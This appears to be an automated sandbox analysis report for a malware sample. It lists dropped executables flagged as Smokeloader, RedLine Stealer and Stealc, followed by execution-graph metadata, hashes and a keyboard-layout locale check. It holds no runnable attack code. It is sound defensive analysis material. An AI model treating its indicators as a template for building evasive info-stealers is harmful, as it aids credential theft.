Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:13:28
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:13:28
Start date:	20/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.1.10.1
Imagebase:	0x7ff72c040000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:13:29
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"
Imagebase:	0x110000
File size:	4'455'936 bytes
MD5 hash:	F8D2B32727EAE3B8B27AB03CA770A941
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	13:13:38
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"
Imagebase:	0x400000
File size:	1'979'392 bytes
MD5 hash:	341918EFC0EB0FE89609A7486A9ED04A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	13:13:47
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"
Imagebase:	0x900000
File size:	1'855'488 bytes
MD5 hash:	D52E2D9DC21C02FA5F8161754B7B6463
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	13:13:57
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"
Imagebase:	0xf20000
File size:	2'899'456 bytes
MD5 hash:	AD87440D4B97E759F9D4EE9D6279D06E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	755
Total number of Limit Nodes:	24

Executed Functions

Function 00B5652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00B5652A,?,?,?,?,?,00B57661), ref: 00B56567

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d50cbdf7f2b10a6dfeaa1725d379e0c5fc5d991edf3db6e691ea7ba26c4fa7a7
Instruction ID: 376daa97bb9310a6dc02ee7d009c3328141a9c37e7eb47ec6547bfa767d8e3fc
Opcode Fuzzy Hash: d50cbdf7f2b10a6dfeaa1725d379e0c5fc5d991edf3db6e691ea7ba26c4fa7a7
Instruction Fuzzy Hash: 0AE0863005020C6ECE25BB15EC19B5D3B9AEB21746F800880FC1497122DB25FD89D640

Function 04C90C79 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dacab3de433ae4f06b7d978a1b34fc9cc25d9a703d811f4b94d01013d586b62
Instruction ID: 42b04d6535119bd4634fbf83ca262a6d7b8479cfb30888d8d8a41d09219c8e01
Opcode Fuzzy Hash: 5dacab3de433ae4f06b7d978a1b34fc9cc25d9a703d811f4b94d01013d586b62
Instruction Fuzzy Hash: 61112BEB34E011BD795180472B18AFB26AFE7C5730738C426F807C5505E2846E997176

Function 00B25C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 00B2612B
Keyboard Layout\Preload, xrefs: 00B26054
00000423, xrefs: 00B260FA
00000422, xrefs: 00B260C9
00000419, xrefs: 00B26098

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: ed913349dc81823447f36b318fac568a8dc311c0509481632ac44b67505d3d30
Instruction ID: ccb9950106ea43436216e4c3610626c519c6b613dc83452cb6aea9a2705a9eed
Opcode Fuzzy Hash: ed913349dc81823447f36b318fac568a8dc311c0509481632ac44b67505d3d30
Instruction Fuzzy Hash: DEF1D070900258ABEB24DF54CC85BDEBBB9EB44304F5042E9F918A7281DB74AA84CB95

Function 00B29BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c03ba979856acf624a3779483818f969205d8357a4f74848569027df77cc7959
Instruction ID: ad7b2e3aa8f9b94172cf220166d97d99ad45f36f4af845716b9bed22c8e01dd2
Opcode Fuzzy Hash: c03ba979856acf624a3779483818f969205d8357a4f74848569027df77cc7959
Instruction Fuzzy Hash: 57313B71A042149BEB08EB78FD8976DBBE2EBC5310F244299E01C9B3D6C7759980C751

Function 00B29F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 77453db5a0498430ce86cfc7d4381f48248301980e33d16d9d8880f725a97c9c
Instruction ID: 1d545751e1037a529005ad078c6ba8854808ba4f363528439fbb54539dc703b4
Opcode Fuzzy Hash: 77453db5a0498430ce86cfc7d4381f48248301980e33d16d9d8880f725a97c9c
Instruction Fuzzy Hash: 00315931A001209BEB18EB78ED997ADB7E2EBC5310F204699E11CDB3D5D776A9808752

Function 00B2A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
